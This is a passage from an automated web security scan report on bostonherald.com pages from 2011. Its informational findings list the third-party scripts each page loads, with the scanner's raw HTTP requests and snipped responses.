<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/golfleaderboard.aspx?sportcode=BE,id="></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.734. http://www.bostonherald.com/sports/hockey/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/hockey/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlministandings.aspx?id=121
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlschedule.aspx?id=121
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlteamleaders.aspx?id=121

Request

GET /sports/hockey/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:00:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlschedule.aspx?id=121"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlministandings.aspx?id=121"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlteamleaders.aspx?id=121"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.735. http://www.bostonherald.com/sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://cdn.cinesport.com/container.js
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:58:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.736. http://www.bostonherald.com/sports/other_sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/other_sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /sports/other_sports/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

18.737. http://www.bostonherald.com/sports/soccer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/soccer/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /sports/soccer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:06:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.738. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://www.google-analytics.com/urchin.js

Request

Response

18.739. http://www.bostonherald.com/track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /track/ HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; ebNewBandWidth_.www.bostonherald.com=1856%3A1296251858097; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.3.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.740. http://www.bostonherald.com/track/celebrity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/celebrity/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.741. http://www.bostonherald.com/track/celebrity/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.742. http://www.bostonherald.com/track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:45:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.743. http://www.bostonherald.com/track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

